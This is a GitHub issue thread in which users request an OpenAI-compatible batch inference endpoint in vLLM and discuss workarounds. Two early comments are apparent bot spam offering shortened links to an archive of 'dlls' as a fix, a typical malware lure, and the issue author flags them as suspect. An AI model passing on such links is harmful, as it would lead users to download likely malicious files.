### ISSUE TITLE
[Feature]: Online Inference on local model with OpenAI Python SDK

### ISSUE THREAD

**Issue by pesc101** [vllm-project/vllm#8631]
### 🚀 The feature, motivation and pitch

OpenAI recently provided a new endpoint batch inference (https://platform.openai.com/docs/guides/batch/overview?lang=curl). It would be nice if it works using the batch format from OpenAI but with a local model.
I created an usage Issue for that before (https://github.com/vllm-project/vllm/issues/8567)

Something like that:

```python
from openai import OpenAI

client = OpenAI(
    api_key="EMPTY",
    base_url="http://localhost:8000/v1",
)

batch_input_file = client.files.create(
  file=open("batchinput.jsonl", "rb"),
  purpose="batch"
)

client.batches.create(
    input_file_id= batch_input_file.id,
    endpoint="/v1/chat/completions",
    completion_window="24h",
    metadata={
      "description": "nightly eval job"
    }
)
```

At the moment there will be an error:
`NotFoundError: Error code: 404 - {'detail': 'Not Found'}`

Advantages for the implementation:

- vllm can be run as a docker container and function only as endpoint
- It is compatible with the OpenAI Python SDK, so easier to use for newbies also the model can be easily switched from the OpenAI server to local models
- Consistent workflow, if you use the docker for Chat

### Alternatives

Internal Implementation:
There was a feature implemented using `python -m vllm.entrypoints.openai_batch` as described here (https://github.com/vllm-project/vllm/issues/4777), but that is not compatible with the OpenAI SDK and also not compatible with the docker setup.

### Before submitting a new issue...

- [X] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.

**Comment by AmjedKhaled165** [comment]
install this

https://bit.ly/4eugCty
I put the necessary dlls in the archive

**Comment by aleroldan156** [comment]
This might help:This file might fix it
https://bit.ly/4gx42eQ
I put the necessary dlls in the archive

**Comment by pesc101** [comment]
Seems to me here are some bots with suspect links 👀

**Comment by DarkLight1337** [comment]
cc @wuisawesome @pooyadavoodi since you two have worked on this

**Comment by wuisawesome** [comment]
> but that is not compatible with the OpenAI SDK and also not compatible with the docker setup

Ooc can you say more about your docker setup? Would it unblock you to mount the directory with data into your docker container? 

Fwiw, the reason I didn't implement this API originally was that I couldn't think of a way to implement the job management without either introducing foot-guns or the first stateful endpoint.

This is not the first time we've heard this request though, and it is probably worth thinking more about if it becomes a recurring theme.

**Comment by pesc101** [comment]
Hey,
you can find my docker setup here: https://github.com/vllm-project/vllm/issues/8567.
I have mounted the directory into the docker.

Okay, I see I don't know exactly how to implement it, but I think it would improve the usability of vllm in general.
I mean, a general advantage of vllm is to use fast batch inference and I think it would be nice if it is compatible with the OpenAI SDK.

**Comment by mbuet2ner** [comment]
Totally agree that this is a interesting feature. Would be super nice to have something standardized here (mentioned something similar [here](https://github.com/vllm-project/vllm/issues/8636)).
We are currently leveraging Ray and the [LLMClass](https://docs.vllm.ai/en/v0.6.2/dev/offline_inference/llm.html) `llm.chat()` for that. Really simliar to the very simple `generate()` example [from the docs](https://docs.vllm.ai/en/latest/getting_started/examples/offline_inference_distributed.html). v.06.2 [even brought support for batch inference](https://github.com/vllm-project/vllm/pull/8648) for the `llm.chat()`.

Our current approach is as follows:
- We build a FastAPI application that accepts `batch.jsonl` files and writes them to a blob storage. You can find the official OpenAI API specification [here](https://github.com/openai/openai-openapi) and can use the [OpenAI Pydantic models](https://github.com/openai/openai-python/tree/main/src/openai/types) from the SDK (which are auto-generated from the API spec) to build your endpoints and validate the data.
- The API then leverages Ray via the `LLMClass`. The `llm.chat()` has a slightly different interface but the `messages` format and the `sampling parameters` are more or less identical to the OpenAI format. Then you can take the Pydantic models from the [existing batch entrypoint](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/run_batch.py) parse the JSONL files, extract the `messages`, `sampling parameters` etc. and give it to `llm.chat()`. After that you can take the `RequestOutput` from `llm.chat()` and iteratively build the [BatchRequestOutput](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/protocol.py#L875) and the intermediate OpenAI/vllm-adapted OpenAI Pydantic models. 

I can share some WIP code on how to parse the JSONL files with Ray, loading it as `BatchRequestInput` and formatting the `llm.chat()` output as `BatchRequestOutput` if you want. It is a little bit complicated due to the different interfaces but it works!

**Comment by wuisawesome** [comment]
boop

**Comment by RyanMarten** [comment]
@wuisawesome @pooyadavoodi I'm also interested in seeing this feature implemented! Having an online OpenAI Batch API endpoint on top of vLLM would be super cool. 

Is there any WIP PR to check out?

**Comment by jkbe** [comment]
I'm also interested in this and saw that there's a half-completed issue over in the production-stack sibling project: https://github.com/vllm-project/production-stack/issues/47

Do you think it makes sense to implement the `v1/batches` OpenAI API here regardless?  Not everyone might want to run the Router from production-stack.

**Comment by pooyadavoodi** [comment]
This may be of interest to some folks: https://github.com/parasail-ai/openai-batch
